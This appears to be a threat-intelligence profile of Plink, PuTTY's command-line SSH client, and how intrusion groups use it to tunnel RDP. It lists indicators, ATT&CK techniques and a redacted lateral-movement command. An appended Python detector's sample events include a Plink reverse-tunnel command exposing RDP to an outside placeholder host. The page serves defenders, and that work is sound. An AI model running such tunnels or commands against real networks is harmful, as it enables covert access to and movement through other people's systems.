Plink
Plink is the command-line connection utility from PuTTY that threat actors repeatedly use as a dual-use SSH tunneling tool rather than bespoke malware. Across the provided reporting, it is used to establish SSH tunnels and reverse tunnels, most commonly to expose or reach internal RDP services, but also to access internal HTTP/IIS services and transfer tools. Observed use cases include tunneling RDP for remote access and lateral movement, creating dedicated conduits into segmented networks, and enabling encrypted SSH-based movement throughout victim environments.
The content links Plink use to multiple threat actors and campaigns. Agrius used Plink to tunnel RDP connections for remote access and lateral movement and in some cases renamed it to systems.exe. In xHunt intrusions at Kuwaiti organizations, operators used the BumbleBee ASPX web shell to execute commands and deploy PuTTY Link (Plink), sometimes renamed RTQ.exe, to create SSH tunnels to internal systems over RDP (TCP 3389) and HTTP (TCP 80); one observed tunnel used external IP 192.119.110[.]194 with credentials bor / 123321, and related infrastructure included 142.11.211[.]79, 91.92.109[.]59, 192.255.166[.]158, backendloop[.]online, bestmg[.]info, windowsmicrosofte[.]online, ns1.backendloop[.]online, and ns2.backendloop[.]online. TEMP.Veles used encrypted SSH-based PLINK tunnels during the C0032 campaign to transfer tools and enable RDP connections throughout the environment. SentinelLabs reported the Iranian-aligned TunnelVision cluster commonly deployed FRPC and Plink, including downloading and executing Plink to tunnel RDP traffic after exploiting VMware Horizon Log4j vulnerabilities. Microsoft also reported Seashell Blizzard / Sandworm-linked activity deploying tunneling utilities such as Chisel, Plink, and rsockstun, including via the LocalOlive web shell.
The content also describes a modified Plink-based backdoor. The file napupdatedb.exe (MD5: BA51F25DB03A66C658D1FD4396F32843) is identified as a modified PLINK/PuTTY executable that initiates an SSH reverse tunnel with embedded credentials from local port 3389 to an attacker-controlled server over TCP 8531. Its embedded configuration stores a semicolon-separated list of Plink command-line arguments containing C2 servers and credentials, and replaces the "*" character in each C2 domain with the infected system’s six-digit local time. In other reporting, actors used renamed Plink binaries such as RTQ.exe and systems.exe for defense evasion.
Victim environments and sectors mentioned in connection with Plink-enabled operations include Kuwaiti organizations, Albanian organizations, Ukrainian entities, and broader targeting of government, telecommunications, energy, oil and gas, shipping, arms manufacturing, and other enterprise networks depending on the actor. Plink itself is not described as self-propagating or inherently persistent in the provided content; its role is as an SSH tunneling utility leveraged by threat actors and, in some cases, modified or renamed to function as a backdoor or covert access mechanism.
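As an added illustration of the renamed-binary cases above (RTQ.exe, systems.exe), the following Python detection sketch is not part of this page or of any of the cited reporting: it parses process command lines and flags Plink-style tunnel options regardless of what the image is called. The sample events, the svc and admin users, the placeholder password and the addresses 203.0.113.10 and 10.0.0.5 are constructed.

```python
import re
import shlex
# OpenSSH has none of these switches, so seeing them next to a -R/-L forward
# is a strong hint that a renamed binary is really Plink.
PLINK_ONLY = {"-pw", "-ssh", "-batch", "-hostkey"}
PORT_LABELS = {3389: "RDP", 80: "HTTP", 445: "SMB"}
FORWARD_RE = re.compile(r"^-(?P<kind>[RL])(?P<spec>.*)$")

def parse_forwards(argv):
    """Yield (kind, listen_port, dest_host, dest_port) per -R/-L forward."""
    i = 1
    while i < len(argv):
        m = FORWARD_RE.match(argv[i])
        if m:
            spec = m.group("spec")
            if not spec and i + 1 < len(argv):  # port spec sits in the next token
                i += 1
                spec = argv[i]
            p = spec.split(":")  # optional listen-IP, listen-port, host, port
            if len(p) >= 3 and p[-1].isdigit() and p[-3].isdigit():
                yield m.group("kind"), int(p[-3]), p[-2], int(p[-1])
        i += 1

def analyze(cmdline):
    """Return the reasons a process command line is suspicious (empty = clean)."""
    argv = shlex.split(cmdline, posix=False) or [""]  # non-POSIX keeps backslashes
    image = argv[0].strip('"').replace("/", "\\").rsplit("\\", 1)[-1].lower()
    switches = PLINK_ONLY.intersection(a.lower() for a in argv[1:])
    forwards = list(parse_forwards(argv))
    if image != "plink.exe" and not (switches or forwards):
        return []  # nothing Plink-like here
    reasons = ["plink.exe executed" if image == "plink.exe"
               else f"tunnel/Plink switches under image {image} (possible renamed Plink)"]
    if "-pw" in switches:
        reasons.append("plaintext password passed with -pw")
    for kind, lport, host, dport in forwards:
        label = PORT_LABELS.get(dport, f"tcp/{dport}")
        if kind == "R":  # reverse tunnel: internal service reachable from the SSH server
            reasons.append(f"reverse tunnel exposes {host}:{dport} ({label}) on server port {lport}")
        else:
            reasons.append(f"local forward {lport} -> {host}:{dport} ({label})")
    return reasons

# Constructed sample events modelled on the renamed-binary cases in the reporting.
SAMPLE_EVENTS = [
    r"C:\Windows\Temp\RTQ.exe -ssh -N -pw REDACTED -R 9000:127.0.0.1:3389 svc@203.0.113.10",
    r'"C:\Program Files\PuTTY\plink.exe" -ssh admin@10.0.0.5',
    r"C:\Windows\System32\notepad.exe C:\Users\a\notes.txt",
]
```

Feed it the CommandLine field of process-creation events (for example Sysmon Event ID 1); an empty list means nothing Plink-like was found.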
Vulnerabilities exploited
3 CVEs Mallory has correlated with this family across public research and vendor advisories.
"The most commonly deployed tunneling tools used by the group are Fast Reverse Proxy Client (FRPC) and Plink."
Groups observed using it
5 distinct threat actors attributed by public researchers.
Agrius used the Plink tool to tunnel RDP connections for remote access and lateral movement in victim environments.
...deploying tunneling utilities such as Chisel, plink, and rsockstun to establish dedicated conduits into affected network segments.
The commands executed on the servers via BumbleBee suggest that the actor used the PuTTY Link (Plink) tool to create SSH tunnels to access services internal to the compromised network.
"The most commonly deployed tunneling tools used by the group are Fast Reverse Proxy Client (FRPC) and Plink."
Techniques & procedures
17 distinct techniques documented for this family, organized by ATT&CK tactic.
Resource Development
1 technique
The content repeatedly states that threat actors 'obtained,' 'acquired,' or 'used' publicly available, open-source, legitimate, or modified tools such as Mimikatz, Cobalt Strike, PsExec, Empire, Impacket, and many others.
Initial Access
2 techniques
The threat actors exploited the ProxyShell and Log4j vulnerabilities to deploy TunnelFish, a custom Fast Reverse Proxy client (FRPC) variant, and enable remote access to vulnerable systems.
"we have observed wide exploitation of ... Microsoft Exchange (ProxyShell)" | "we have observed wide exploitation of Fortinet FortiOS (CVE-2018-13379)" | "we have observed wide exploitation of ... recently Log4Shell... focusing around exploitation of VMware Horizon Log4j vulnerabilities."
Execution
1 technique
The commands show the actor: Laterally moving... by mounting a shared folder, copying Plink (RTQ.exe) to a remote system and using Windows Management Instrumentation (WMI) (T1047) to create an SSH tunnel for RDP access.
Persistence
1 technique
Stealth
2 techniques
"Review your artifacts of execution for 'plink.exe' file execution. Note that attackers can rename the file name to avoid detection."
The commands show the actor: Removing evidence of their presence by deleting (T1070.004) BumbleBee after they were done issuing commands.
Lateral Movement
5 techniques
"The threat actor used RDP with valid account credentials for lateral movement..."
We observed the actor using Plink to create an SSH tunnel for TCP port 3389, which suggests that the actor used the tunnel to access the system using Remote Desktop Protocol (RDP).
15:49:30 net use \\<redacted IP #3>\C$ /user:<redacted domain>\<redacted username #2> <redacted password #1> T1021.002
The threat actor used Plink and PuTTY for lateral movement. Artifacts of Plink were used for encrypted sessions in the system registry hive.
The commands show the actor: Laterally moving (T1570) to another system by mounting a shared folder, copying Plink (RTQ.exe) to a remote system...
Command and Control
6 techniques
“Sliver… penetration testing framework. Chisel… creates a TCP/UDP tunnel… over HTTP… secured via SSH… FastReverseProxy (FRP)… to expose local servers to the public internet.”
Agrius used the Plink tool to tunnel RDP connections for remote access and lateral movement in victim environments.
Several entries mention use of proxy and tunneling tools including PLINK, Venom proxy, GOST reverse proxy, Ligolo, Cloudflared, rsocx reverse proxy, Iox proxy tool, NPS tunneling tool, and AirVPN.
FIN8 has used the Plink utility to tunnel RDP back to C2 infrastructure. REPTILE can use TLS over raw TCP for secure C2.
"attempted to download ngrok" and "Download and execution of tunneling tools, including Plink and Ngrok"; also mentions transfer.sh, ufile.io, raw.githubusercontent.com.
PRC state-sponsored cyber actors also utilized command line utility programs like PuTTY Link (Plink) to establish SSH tunnels [T1572] between internal hosts and leased virtual private server (VPS) infrastructure.
Recent activity
13 sources tracked across advisories, community write-ups, and news.
Command-line network connection tool often used for tunneling and remote access.
SSH/tunneling utility used to create access conduits into compromised network segments.
Command-line SSH client (PuTTY suite) used for scripted remote connections and tunneling.
Publicly available network communication utility used by the attackers as part of the intrusion toolset.